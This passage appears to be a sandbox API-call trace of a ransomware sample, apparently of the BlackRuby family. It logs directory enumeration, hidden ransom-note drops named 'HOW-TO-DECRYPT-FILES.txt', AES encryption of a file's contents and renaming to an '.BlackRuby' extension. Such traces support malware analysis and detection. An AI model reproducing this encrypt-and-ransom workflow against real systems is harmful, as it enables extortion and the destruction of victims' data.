users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), fInfoLevelId=0x0, lpFileInformation=0x1bb6a30 | out: lpFileInformation=0x1bb6a30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29135300, ftCreationTime.dwHighDateTime=0x1cb8519, ftLastAccessTime.dwLowDateTime=0xdc6a32c0, ftLastAccessTime.dwHighDateTime=0x1d2da17, ftLastWriteTime.dwLowDateTime=0x29135300, ftLastWriteTime.dwHighDateTime=0x1cb8519, nFileSizeHigh=0x0, nFileSizeLow=0x1df)) returned 1 [0047.983] GetLastError () returned 0x12 [0047.983] SetErrorMode (uMode=0x0) returned 0x1 [0047.983] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x51 [0047.984] GetLastError () returned 0x12 [0047.984] SetErrorMode (uMode=0x1) returned 0x0 [0047.984] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.984] GetLastError () returned 0x0 [0047.984] GetFileType (hFile=0x184) returned 0x1 [0047.984] SetErrorMode (uMode=0x0) returned 0x1 [0047.984] GetFileType (hFile=0x184) returned 0x1 [0047.984] WriteFile (in: hFile=0x184, lpBuffer=0x1bd2530*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1bd2530*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0047.985] GetLastError () returned 0x0 [0047.985] CloseHandle (hObject=0x184) returned 1 [0047.985] GetLastError () returned 0x0 [0047.985] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x51 [0047.985] GetLastError () returned 0x0 [0047.985] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.985] GetLastError () returned 0x0 [0047.985] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Application Data", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Application Data", lpFilePart=0x0) returned 0x23 [0047.985] GetLastError () returned 0x0 [0047.985] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.985] GetLastError () returned 0x0 [0047.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.985] GetLastError () returned 0x0 [0047.985] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Application Data", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Application Data", lpFilePart=0x0) returned 0x23 [0047.985] GetLastError () returned 0x0 [0047.985] SetErrorMode (uMode=0x1) returned 0x0 [0047.985] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0047.986] GetLastError () returned 0x5 [0047.986] SetErrorMode (uMode=0x0) returned 0x1 [0047.986] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Desktop", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Desktop", lpFilePart=0x0) returned 0x1a [0047.986] GetLastError () returned 0x5 [0047.986] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.986] GetLastError () returned 0x5 [0047.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.986] GetLastError () returned 0x5 [0047.986] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Desktop", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Desktop", lpFilePart=0x0) returned 0x1a [0047.986] GetLastError () returned 0x5 [0047.987] SetErrorMode (uMode=0x1) returned 0x0 [0047.987] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0047.987] GetLastError () returned 0x5 [0047.987] SetErrorMode (uMode=0x0) returned 0x1 [0047.987] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Documents", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Documents", lpFilePart=0x0) returned 0x1c [0047.987] GetLastError () returned 0x5 [0047.987] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.987] GetLastError () returned 0x5 [0047.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.987] GetLastError () returned 0x5 [0047.987] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Documents", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Documents", lpFilePart=0x0) returned 0x1c [0047.988] GetLastError () returned 0x5 [0047.988] SetErrorMode (uMode=0x1) returned 0x0 [0047.988] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0047.988] GetLastError () returned 0x5 [0047.988] SetErrorMode (uMode=0x0) returned 0x1 [0047.988] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Favorites", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Favorites", lpFilePart=0x0) returned 0x1c [0047.988] GetLastError () returned 0x5 [0047.988] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.988] GetLastError () returned 0x5 [0047.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.989] GetLastError () returned 0x5 [0047.989] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Favorites", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Favorites", lpFilePart=0x0) returned 0x1c [0047.989] GetLastError () returned 0x5 [0047.989] SetErrorMode (uMode=0x1) returned 0x0 [0047.989] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Favorites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0047.989] GetLastError () returned 0x5 [0047.989] SetErrorMode (uMode=0x0) returned 0x1 [0047.989] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft", lpFilePart=0x0) returned 0x1c [0047.989] GetLastError () returned 0x5 [0047.990] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft Help", lpFilePart=0x0) returned 0x21 [0047.990] GetLastError () returned 0x5 [0047.990] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla", lpFilePart=0x0) returned 0x1a [0047.990] GetLastError () returned 0x5 [0047.990] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.990] GetLastError () returned 0x5 [0047.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.990] GetLastError () returned 0x5 [0047.990] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla", lpFilePart=0x0) returned 0x1a [0047.990] GetLastError () returned 0x5 [0047.990] SetErrorMode (uMode=0x1) returned 0x0 [0047.990] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.990] GetLastError () returned 0x5 [0047.990] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.990] GetLastError () returned 0x5 [0047.990] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.991] GetLastError () returned 0x5 [0047.991] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.991] GetLastError () returned 0x12 [0047.991] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.991] SetErrorMode (uMode=0x0) returned 0x1 [0047.991] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla", lpFilePart=0x0) returned 0x1a [0047.991] GetLastError () returned 0x12 [0047.991] SetErrorMode (uMode=0x1) returned 0x0 [0047.991] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.991] GetLastError () returned 0x12 [0047.991] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.991] GetLastError () returned 0x12 [0047.991] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.991] GetLastError () returned 0x12 [0047.991] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.991] GetLastError () returned 0x12 [0047.991] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.991] SetErrorMode (uMode=0x0) returned 0x1 [0047.991] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs", lpFilePart=0x0) returned 0x1f [0047.991] GetLastError () returned 0x12 [0047.991] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.991] GetLastError () returned 0x12 [0047.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.991] GetLastError () returned 0x12 [0047.991] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs", lpFilePart=0x0) returned 0x1f [0047.991] GetLastError () returned 0x12 [0047.991] SetErrorMode (uMode=0x1) returned 0x0 [0047.991] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.991] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.992] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.992] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.992] GetLastError () returned 0x12 [0047.992] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.992] SetErrorMode (uMode=0x0) returned 0x1 [0047.992] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs", lpFilePart=0x0) returned 0x1f [0047.992] GetLastError () returned 0x12 [0047.992] SetErrorMode (uMode=0x1) returned 0x0 [0047.992] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.992] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.992] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.992] GetLastError () returned 0x12 [0047.992] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.992] GetLastError () returned 0x12 [0047.992] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.992] SetErrorMode (uMode=0x0) returned 0x1 [0047.992] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0047.992] GetLastError () returned 0x12 [0047.992] SetErrorMode (uMode=0x1) returned 0x0 [0047.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x1bda678 | out: lpFileInformation=0x1bda678*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74b72710, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x74b72710, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x76dd04b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa4)) returned 1 [0047.992] GetLastError () returned 0x12 [0047.992] SetErrorMode (uMode=0x0) returned 0x1 [0047.993] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0047.993] GetLastError () returned 0x12 [0047.993] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0047.993] GetLastError () returned 0x12 [0047.993] SetErrorMode (uMode=0x1) returned 0x0 [0047.993] CreateFileW (lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.993] GetLastError () returned 0x0 [0047.993] GetFileType (hFile=0x184) returned 0x1 [0047.993] SetErrorMode (uMode=0x0) returned 0x1 [0047.993] GetFileType (hFile=0x184) returned 0x1 [0047.993] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xa4 [0047.993] GetLastError () returned 0x0 [0047.993] ReadFile (in: hFile=0x184, lpBuffer=0x1bdc44c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bdc44c*, lpNumberOfBytesRead=0x18ed18*=0xa4, lpOverlapped=0x0) returned 1 [0047.994] GetLastError () returned 0x0 [0047.994] CloseHandle (hObject=0x184) returned 1 [0047.994] GetLastError () returned 0x0 [0047.994] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0047.994] GetLastError () returned 0x0 [0047.994] SetErrorMode (uMode=0x1) returned 0x0 [0047.994] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74b72710, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x74b72710, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x76dd04b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa4)) returned 1 [0047.994] GetLastError () returned 0x0 [0047.994] SetErrorMode (uMode=0x0) returned 0x1 [0047.994] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0047.994] GetLastError () returned 0x0 [0048.024] CryptImportKey (in: hProv=0x37c708, pbData=0x1c378f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0048.024] GetLastError () returned 0x0 [0048.024] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.024] GetLastError () returned 0x0 [0048.029] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.029] GetLastError () returned 0x0 [0048.029] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f60) returned 1 [0048.029] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.029] GetLastError () returned 0x0 [0048.029] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c6493c*=0x1, dwFlags=0x0) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c64908, dwFlags=0x0) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c64984*, pdwDataLen=0x18ed08*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x1c64984*, pdwDataLen=0x18ed08*=0x1a0) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c64cf0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c64cf0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c64d20*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c64d20*, pdwDataLen=0x18ed28*=0x10) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] CryptDestroyKey (hKey=0x360b60) returned 1 [0048.030] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.030] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.030] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0048.030] GetLastError () returned 0x0 [0048.030] SetErrorMode (uMode=0x1) returned 0x0 [0048.030] CreateFileW (lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.031] GetLastError () returned 0xb7 [0048.031] GetFileType (hFile=0x184) returned 0x1 [0048.031] SetErrorMode (uMode=0x0) returned 0x1 [0048.031] GetFileType (hFile=0x184) returned 0x1 [0048.032] CloseHandle (hObject=0x184) returned 1 [0048.033] GetLastError () returned 0xb7 [0048.033] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpFilePart=0x0) returned 0x3e [0048.033] GetLastError () returned 0xb7 [0048.033] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\Encrypted_hilde9N7jwB0cRqG8U5Xg4F7cIenxhHVEPlU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\Encrypted_hilde9N7jwB0cRqG8U5Xg4F7cIenxhHVEPlU.BlackRuby", lpFilePart=0x0) returned 0x58 [0048.033] GetLastError () returned 0xb7 [0048.033] SetErrorMode (uMode=0x1) returned 0x0 [0048.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74b72710, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x74b72710, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x24d45b00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1b0)) returned 1 [0048.033] GetLastError () returned 0xb7 [0048.033] SetErrorMode (uMode=0x0) returned 0x1 [0048.033] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="C:\\Users\\All Users\\Mozilla\\logs\\Encrypted_hilde9N7jwB0cRqG8U5Xg4F7cIenxhHVEPlU.BlackRuby" (normalized: "c:\\users\\all users\\mozilla\\logs\\encrypted_hilde9n7jwb0crqg8u5xg4f7cienxhhveplu.blackruby")) returned 1 [0048.033] GetLastError () returned 0xb7 [0048.034] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x38 [0048.034] GetLastError () returned 0xb7 [0048.034] SetErrorMode (uMode=0x1) returned 0x0 [0048.034] CreateFileW (lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\mozilla\\logs\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.034] GetLastError () returned 0x0 [0048.034] GetFileType (hFile=0x184) returned 0x1 [0048.034] SetErrorMode (uMode=0x0) returned 0x1 [0048.034] GetFileType (hFile=0x184) returned 0x1 [0048.035] CloseHandle (hObject=0x184) returned 1 [0048.036] GetLastError () returned 0x0 [0048.036] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x38 [0048.036] GetLastError () returned 0x0 [0048.036] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.036] GetLastError () returned 0x0 [0048.036] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Oracle", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Oracle", lpFilePart=0x0) returned 0x19 [0048.036] GetLastError () returned 0x0 [0048.036] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.036] GetLastError () returned 0x0 [0048.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.036] GetLastError () returned 0x0 [0048.036] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Oracle", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Oracle", lpFilePart=0x0) returned 0x19 [0048.036] GetLastError () returned 0x0 [0048.036] SetErrorMode (uMode=0x1) returned 0x0 [0048.036] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.036] GetLastError () returned 0x0 [0048.036] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.036] GetLastError () returned 0x0 [0048.037] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.037] GetLastError () returned 0x12 [0048.037] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.037] SetErrorMode (uMode=0x0) returned 0x1 [0048.037] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Oracle", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Oracle", lpFilePart=0x0) returned 0x19 [0048.037] GetLastError () returned 0x12 [0048.037] SetErrorMode (uMode=0x1) returned 0x0 [0048.037] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.037] GetLastError () returned 0x12 [0048.037] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.037] GetLastError () returned 0x12 [0048.037] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.037] GetLastError () returned 0x12 